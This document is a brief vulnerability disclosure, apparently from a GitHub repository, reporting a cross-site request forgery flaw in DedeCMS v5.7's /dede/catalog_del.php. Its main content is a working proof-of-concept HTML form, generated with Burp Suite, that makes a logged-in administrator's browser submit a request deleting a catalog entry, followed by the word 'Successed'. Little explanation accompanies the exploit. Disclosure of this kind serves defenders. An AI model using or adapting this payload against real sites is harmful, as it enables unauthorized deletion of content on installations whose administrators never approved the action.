target:https://github.com/wdsunwq/DedeCMSv5 version: v5.7

DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /dede/catalog_del.php

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/src/dede/catalog_del.php" method="POST">
      <input type="hidden" name="id" value="20" />
      <input type="hidden" name="dopost" value="ok" />
      <input type="hidden" name="delfile" value="no" />
      <input type="hidden" name="imageField1&#46;x" value="35" />
      <input type="hidden" name="imageField1&#46;y" value="4" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Successed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

3.md

3.md

Files

3.md

Latest commit

History

3.md

File metadata and controls